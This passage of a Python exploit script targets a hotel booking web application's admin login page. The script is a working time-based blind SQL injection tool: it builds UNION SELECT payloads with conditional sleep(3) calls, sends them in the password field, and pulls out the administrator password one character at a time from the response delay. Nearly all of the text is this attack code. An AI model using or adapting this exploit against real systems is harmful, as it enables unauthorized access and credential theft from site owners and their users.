'o',    'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D',    'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S',    'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '0', '1', '2', '3', '4', '5', '6', '7',    '8', '9', '@', '#']def sqliPayload(char, position, userid, column, table):    sqli = 'admin\' UNION SELECT IF(SUBSTRING('    sqli += str(column) + ','    sqli += str(position) + ',1) = \''    sqli += str(char) + '\',sleep(3),null) FROM '    sqli += str(table) + ' WHERE uname="admin"\''    return sqlidef postRequest(URL, sqliReq, char, position):    sqliURL = URL    params = {"emailusername": "admin", "password": sqliReq, "submit": "Login"}    req = requests.post(url=sqliURL, data=params, verify=False, proxies=proxies, timeout=10)    if req.elapsed.total_seconds() >= 2:        print("{} : {}".format(char, req.elapsed.total_seconds()))        return char    return ''def theHarvester(target, CHARS, url):    #print("Retrieving: {} {} {}".format(target['table'], target['column'], target['id']))    print("Retrieving admin password".format(target['table'], target['column'], target['id']))    position = 1    full_pass = ""    while position < 5:        for char in CHARS:            sqliReq = sqliPayload(char, position, target['id'], target['column'], target['table'])            found_char = postRequest(url, sqliReq, char, position)            full_pass += found_char        position += 1    return full_passif __name__ == "__main__":    banner()    HOST = str(args.url)    PATH = HOST + "/hotel booking/admin/login.php"    adminPassword = {"id": "1", "table": "manager", "column": "upass"}    adminPass = theHarvester(adminPassword, chars, PATH)    print("Admin Password:", adminPass)

Tag

#debian